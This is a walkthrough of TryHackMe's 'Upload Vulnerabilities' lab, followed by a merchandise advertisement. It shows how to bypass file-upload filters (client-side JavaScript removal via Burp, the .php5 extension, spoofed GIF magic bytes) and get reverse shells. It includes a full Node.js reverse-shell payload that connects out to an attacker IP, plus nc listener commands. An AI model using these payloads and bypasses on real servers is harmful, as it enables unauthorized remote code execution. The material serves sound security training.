This is the write up for the room Upload Vulnerabilities on Tryhackme and it is part of the Web Fundamentals Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
TASKS Upload Vulnerabilities
Task 1
Follow along this task. It is self-explanatory. This is very important otherwise you will not be able to clear the rest of this room
It is only one command you need to enter in the terminal
echo "<MACHINE_IP> overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts
to revert
sudo sed -i '$d' /etc/hosts
Task 2
Read all that is in this task and press complete
Task 3
Read all that is in this task and press complete
Task 4
Read all that is in this task
4.1 What is the name of the image file which can be overwritten?
Open the website http://overwrite.uploadvulns.thm/
Right click and view image info
4.2 Overwrite the image. What is the flag you receive?
Now upload a files called mountains.jpg
Task 5
Read all that is in the task
Navigate to shell.uploadvulns.thm and complete the questions for this task.
5.1 Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads? (N.B. This is a good habit to get into, and will serve you well in the upcoming tasks…)
First we run gobuster by typing in
gobuster -u http://shell.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Type in the command and do not copy it. Sometime this will give errors
Now upload a files so we can see where it is added ( select the file then press upload ). I have uploaded mountains.jpg
And we see it in resources
5.2 Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?
Let’s go for a reverse shell.
first we need to copy the correct shell to use. It come with KALI
Type in the following command to copy the webshell.php so we can edit it and leave the source as it is
cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php
Now change the ip to you tun0 IP
We leave the port as is. now press control+x to exit and save
Start a listner by typing in the following command
nc -nlvp 1234
Now upload the shell.php and check the resources page
Now click on this and go back to the terminal where we have started the listner
and we have a shel
now type in
cd /var/www
ls
cat flag.txt
Task 6
Read all that is in the task.
6.1 What is the traditional server-side scripting language?
Answer: php
6.2 When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?
Answer: Correct Answer
6.3 [Research] What MIME type would you expect to see when uploading a CSV file?
You can guess this one. a cvs file is always a txt file. As multiple system can read it
Answer text/csv
Task 7
Read all that is in the task
7.1 What is the flag in /var/www/?
If you want to scan with gobuster you can by typing in the following command
gobuster -u http://java.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This will reveal the image and assets directory
We will use the webshell.php in previous task
Start up Burpsuite and put intercept on. Followi this guide if you do not know how to configure Firefox with Burp Configure Burpsuite with Firefox
Now navigate to the page http://java.uploadvulns.thm/
You will se this
Right click and Do intercept -> response to this request
Then press Forward
Now delete the client side filter and press forward
Now go back to the site and upload the webshell.php
Once you see the webshell in burp you can turn off burp or press Forward until you see an succefull upload
Now start up a listner in a terminal by typing
nc -nlvp 1234
Now go to the image directory we have found and click on the shell.php
http://java.uploadvulns.thm/images/
cat /var/www/flag.txt
Task 8
Read all that is in the task
8.1 What is the flag in /var/www/?
Firt we do a gobuster by typing in
gobuster -u http://annex.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We find
Use the command select to selct a file and then type upload to upload the file. As we notice webshell.php is invalid so we open up the givne wiki page and fin dall the php extensions we can try
Bij renaming the webshell.php th webshell.php5 and then upload it we have a succes
It laso changes the name. Now start up a lisner with the following command
nc – nlvp 1234
Click on the php5 file in the privacy directory and notice the shell
cat out the flag by tiping
cat /var/www/flag.txt
Task 9
9.1 Grab the flag from /var/www/
First we do a dirbuster scan by typing in the following command
gobuster -u http://magic.uploadvulns.thm dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
The graphics directory is fobidden
Now we try to upload the shell.php file and we see an error
So it wants an gif file. Let’s see if we can do the maic number hack here
first make a copy of the shell.php just in case we need to revert
I will copy and rename the file to magic.php by typing in the followin gcommand
cp shell.php magic.php
Here we can find the list of signatures List of file signatures – Wikipedia
for gif it is
So there are 2.
47 49 46 38 37 61 47 49 46 38 39 61
The number is 6 bytes long. Add AAAAAA to the magic.php file
nano magic.php
Save the file then open it in hexeditor by typing
hexeditor magic.php
Now change the bytes to what we have found
Now upload this file
Start a listner by typing in
nc -nlvp 1234
Indexing is off on the server so we need to type in the the following
http://magic.uploadvulns.thm/graphics/magic.php
cat /var/www/flag.txt
Task 10
Read all that is in the task and press complete
Task 11
11. Hack the machine and grab the flag from /var/www/
Ok now for the fun part
Run gobuster first
Now go to the site jewel.uploadvulns.thm
Let’s try to upload a file and It is telling me it want an jpg file
Looking at the source we see upload.js and clicking on it revels the filters for the client side
Let’s try to bypass this client filter and it will probably also be on the server side, However first let us analyse the webpage
It is node.js . This means the reverse shell we used probably does not work.
At this page we will find a payload we can use
Payload
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(443, "10.0.0.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();Save this file as shell.js and adjust the setting in the payload to your IP and use port number 443
Now we need to bypass in order to upload. To do this we need to deactivate the client filter first. Looking at the source we see an upload.js that holds the filters as we have seen.
Startup Burpsuite and turn on intercept
Reload the page by pressing control+F5 so it will flush out the cashed upload.js
In burpsuite forward until you find upload.js
If you do not get this screen then go to options and turn of file extension under intecept client requests
Now click forward until you see this java script
Delete the highted functions and press foward
When uploading the file we still get invalid format. change the name of the file to shell.jpg and try again.
Now we need to find where the file is stored so we can run it
With dirbuster we have found an admin page. navigating to this admin page reveals
This is probably where we need to activate from. It also tels us a module directory
Download the attached given file and use this with dirbuster to scan the found directories
Im sure our file is here. So let’s upload the file again and the run dirbuster again
Now we know where a file is. Now we need to find a way to execute it
First start a listener on port 443 by typing in a terminal
nc -nlvp 443
Going back to the admin page and enter the file name AZC.jpg
Opening burp and intercept the request
Go to the admin page again and now we will go up a directory and in the content directory
Go back to the terminal where the listner started
cat the flag with the command
cat /var/www/flag.txt
Now we have completed this challenge and the room Upload Vulnerabilities. I must admin I did take a look at the hints. I was more stuck on Burp suite to get the upload.js in order to bypass it. Clear out the Firefox cache an turn off the file extensions in burp did the trick.
Great designs and products for your hacker’s cave
You can get these designs on more than 70 products ranging from
- T-shirt
- mugs
- mousepad
- baseball caps
- Metal prints
- Art Board
And much more.
